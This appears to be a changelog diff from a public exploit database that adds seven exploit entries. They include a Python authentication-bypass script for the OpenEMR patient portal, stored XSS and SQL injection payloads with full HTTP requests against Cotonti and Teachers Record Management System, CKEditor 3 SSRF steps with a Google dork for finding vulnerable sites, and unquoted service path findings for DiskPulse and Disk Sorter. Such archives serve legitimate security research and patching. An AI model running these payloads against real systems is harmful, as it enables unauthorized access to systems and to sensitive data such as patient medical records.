DB: 2021-06-17

7 changes to exploits/shellcodes

DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)
CKEditor 3 - Server-Side Request Forgery (SSRF)

exploits/php/webapps/50016.txt

@@ -0,0 +1,77 @@
+# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
+# Date: 2021-15-06
+# Exploit Author: Fatih İLGİN
+# Vendor Homepage: cotonti.com
+# Vulnerable Software: https://www.cotonti.com/download/siena_0919
+# Affected Version: 0.9.19
+# Tested on: Windows 10
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: maintitle
+# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>
+
+# Description
+
+1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
+2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param
+3) Then click Update button
+4) In the end, Go to home page then shown triggered vulnerability
+
+
+# Proof of Concepts
+
+Request;
+
+POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
+Host: vulnerableapplication.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 440
+Origin: https://vulnerableapplication.com
+Connection: close
+Referer:
+https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
+Cookie:
+__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;
+__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;
+_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;
+__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;
+PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3
+
+&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D
+
+
+Response;
+
+HTTP/1.1 200 OK
+Date: Tue, 15 Jun 2021 16:07:59 GMT
+Server: Apache
+Expires: Mon, Apr 01 1974 00:00:00 GMT
+Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
+Pragma: no-cache
+Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
+Vary: Accept-Encoding
+X-Robots-Tag: noindex,nofollow
+Content-Length: 4366
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<h1 class="body"><a href="admin.php" title="Administration
+panel">Administration panel</a>  /  <a href="admin.php?m=config"
+title="Configuration">Configuration</a>  /  <a
+href="admin.php?m=config&n=edit&o=core&p=title" title="Titles
+and Metas">Titles and Metas</a></h1>
+
+<div id="main" class="body clear">
+<h2>Configuration</h2>
+<div class="done">
+<h4>Done</h4>
+<ul>
+<li>Updated</li>
+</ul>
+</div>

exploits/php/webapps/50017.py

@@ -0,0 +1,88 @@
+# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
+# Date 15.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
+# Version: All versions prior to 5.0.1.4
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-15152
+# CWE: CWE-287
+# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
+
+'''
+Description:
+An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
+the registration page and modifying the requested url to access the desired page. Some
+examples of pages in the portal directory that are accessible after browsing to the
+registration page include:
+- add_edit_event_user.php
+- find_appt_popup_user.php
+- get_allergies.php
+- get_amendments.php
+- get_lab_results.php
+- get_medications.php
+- get_patient_documents.php
+- get_problems.php
+- get_profile.php
+- portal_payment.php
+- messaging/messages.php
+- messaging/secure_chat.php
+- report/pat_ledger.php
+- report/portal_custom_report.php
+- report/portal_patient_report.php
+Normally, access to these pages requires authentication as a patient. If a user were to visit
+any of those pages unauthenticated, they would be redirected to the login page.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--Openemrpath', type=str)
+my_parser.add_argument('-R', '--PathToGet', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+openemr_path = args.Openemrpath
+pathtoread = args.PathToGet
+
+
+'''
+Check for vulnerability:
+'''
+# Check, if Registration portal is enabled. If it is not, this exploit can not work
+session = requests.Session()
+check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
+check_vuln = session.get(check_vuln_url).text
+print('')
+print('[*] Checking vulnerability: ')
+print('')
+
+if "Enter email address to receive registration." in check_vuln:
+    print('[+] Host Vulnerable. Proceeding exploit')
+else:
+    print('[-] Host is not Vulnerable: Registration for patients is not enabled')
+
+'''
+Exploit:
+'''
+header = {
+    'Referer': check_vuln_url
+}
+exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
+Exploit = session.get(exploit_url, headers=header)
+print('')
+print('[+] Results: ')
+print('')
+print(Exploit.text)
+print('')

exploits/php/webapps/50018.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/login.php
+2. Login with default creds
+3. Execute the payload
+
+Payload #1:
+
+POST /admin/search.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/search.php
+Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
+Upgrade-Insecure-Requests: 1
+
+searchdata=a' or 1=1-- -&search=
+
+Payload #2:
+
+http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
+
+Payload #3:
+
+http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -

exploits/php/webapps/50019.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
+# Date: 05-10-2021
+# Exploit Author: nhattruong
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 + XAMPP v3.2.4
+
+POC:
+1. Go to url http://localhost/admin/index.php
+2. Do login
+3. Execute the payload
+4. Reload page to see the different
+
+Payload:
+
+POST /admin/adminprofile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/trms/admin/adminprofile.php
+Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
+Upgrade-Insecure-Requests: 1
+
+adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=

exploits/php/webapps/50021.txt

@@ -0,0 +1,53 @@
+# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
+# Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html
+# Date: 12-6-2021
+# Exploit Author: Blackangel
+# Software Link: https://ckeditor.com/
+# Version:all version under 4 (1,2,3)
+# Tested on: windows 7
+
+Steps of Exploit:-
+
+1-using google dorks
+
+inurl /editor/filemanager/connectors/uploadtest.html
+
+2-after going to vulnerable page you will find filed “Custom Uploader URL: ”
+
+3-right click then choose inspect element, click on pick an element from
+the page , select field Custom Uploader URL:
+
+4-in elements “<input id=”txtCustomUrl” style=”WIDTH: 100%;
+BACKGROUND-COLOR: #dcdcdc” disabled=”” type=”text”>”
+
+delete disabled=””
+
+5-now you can put url start with any protocal
+
+6-send it to the server as you see website that you have entered link
+
+is appear into page .
+
+what this mean??!!1
+
+you send request to server using vulnerable website
+
+you can said i used it as proxy
+
+hackers >>> vulnerable website >>> http:/xx.com
+
+so in http://xx.com logs requests come from vulnerable website
+
+impact:-
+
+1-that allows an attacker to induce the server-side application to make
+HTTP requests to an arbitrary domain of the attacker’s choosing. if there
+is big company use old version hackers can send request via there websites
+and this not good for reputation of company
+
+2-put big company website in blacklist of websites cause i hackers can send
+many of request via vulnerable website
+
+Mitigation:-
+
+Remove the uploadtest.html file as it is not used by the application.

exploits/windows/local/50012.txt

@@ -0,0 +1,50 @@
+# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://www.diskpulse.com
+# Software Links:
+# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
+# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
+# Tested Version: 13.6.14
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Pulse Enterprise   Disk Pulse Enterprise  C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe    Auto
+Disk Pulse Server    Disk Pulse Server   C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe   Auto
+
+C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Enterprise
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Enterprise\bin\diskpls.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Disk Pulse Enterprise
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc "Disk Pulse Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Pulse Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Pulse
+Server\bin\diskpls.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Disk Pulse Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/local/50013.txt

@@ -0,0 +1,31 @@
+ # Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
+# Discovery by: BRushiran
+# Date: 15-06-2021
+# Vendor Homepage: https://www.disksorter.com
+# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
+# Tested Version: 13.6.12
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Sorter Server   Disk Sorter Server   C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe   Auto
+
+C:\>sc qc "Disk Sorter Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Sorter Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
+Server\bin\disksrs.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Disk Sorter Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

files_exploits.csv

@@ -11368,6 +11368,8 @@ id,file,description,date,author,type,platform,port
 50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
 50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
+50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows,
+50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44165,3 +44167,8 @@ id,file,description,date,author,type,platform,port
 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,
 50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php,
 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,
+50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",2021-06-16,"Fatih İLGİN",webapps,php,
+50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass",2021-06-16,"Ron Jost",webapps,php,
+50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,
+50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,
+50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,